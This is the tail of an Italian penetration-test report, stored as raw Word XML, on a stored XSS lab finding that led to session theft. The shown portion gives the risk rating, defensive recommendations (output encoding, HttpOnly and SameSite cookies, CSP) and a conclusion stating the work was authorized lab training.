                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impatto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Furto di sessione e completo controllo dell'account (account takeover)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Interazione richiesta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Minima: la sola visita di una pagina legittima</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Diffusione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Elevata: colpisce ogni visitatore della pagina compromessa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La combinazione di facilità di sfruttamento, assenza di interazione consapevole della vittima e impatto elevato (presa di controllo dell'account) colloca questa vulnerabilità in fascia di rischio alta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Raccomandazioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Codifica dell'output (output encoding): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">codificare in entità HTML ogni dato proveniente dagli utenti prima di inserirlo in pagina, così che non venga mai interpretato come codice. È la difesa primaria contro l'XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Validazione lato server: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">adottare un approccio a whitelist e non affidarsi a blacklist parziali né a controlli puramente lato client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie con flag HttpOnly: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">impedisce a JavaScript di leggere i cookie di sessione, vanificando l'esfiltrazione anche in presenza di un XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Flag Secure e SameSite: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trasmettere i cookie solo su HTTPS e limitarne l'invio cross-site.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Content Security Policy (CSP): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una policy restrittiva riduce la capacità di uno script iniettato di eseguire e comunicare con l'esterno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Connessione cifrata (HTTPS): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">proteggere l'intera applicazione, evitando pagine di login su HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">12. Conclusioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il test ha confermato la presenza di una vulnerabilità XSS persistente sfruttabile per il furto di sessione, dimostrandone l'intera catena fino all'impersonificazione dell'utente amministratore. La vulnerabilità è risultata sfruttabile anche al livello di sicurezza MEDIUM, a riprova dell'inadeguatezza dei filtri basati su blacklist. L'adozione delle contromisure raccomandate — in primis la codifica dell'output e il flag HttpOnly sui cookie — neutralizzerebbe efficacemente l'attacco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CECBF6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="534AB7"/>
        </w:rPr>
        <w:t xml:space="preserve">Nota etica. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tutte le attività descritte sono state condotte esclusivamente in ambiente di laboratorio isolato, su sistemi di proprietà e con autorizzazione, a fini formativi. L'applicazione di queste tecniche su sistemi o account altrui, senza autorizzazione esplicita, costituisce un illecito.</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4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="5F5E5A"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Data Defender — Report riservato</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5F5E5A"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	Pag. </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5F5E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20"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="534AB7"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="620" w:hanging="320"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="534AB7"/>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2C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b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rPr>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99845eeb8b90fdd5709d1f9653df81e44edeb54.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/dc58019852ecec7c00715fa34da84a05f8d2eeb2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8196f4c06a87bea12086ef4aef3ac953f4510e24.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/48666b679ab756a060d87fab6cd608576b1ffc64.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cef516374671e000bf7801d2a9e8b5e680b10914.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/86f8b0b1bc18f01a908af8c03a073c3ab0fee47c.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cce37a9e240c77a2a8b6d775188122c99494f072.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c30c9006ab9a5945107ff9b484b3e23a748bd9f2.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6fa2270792fbcdbd128eb638e5244074c1bad753.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2026-07-27T09:17:47.815Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-27T09:17:47.829Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>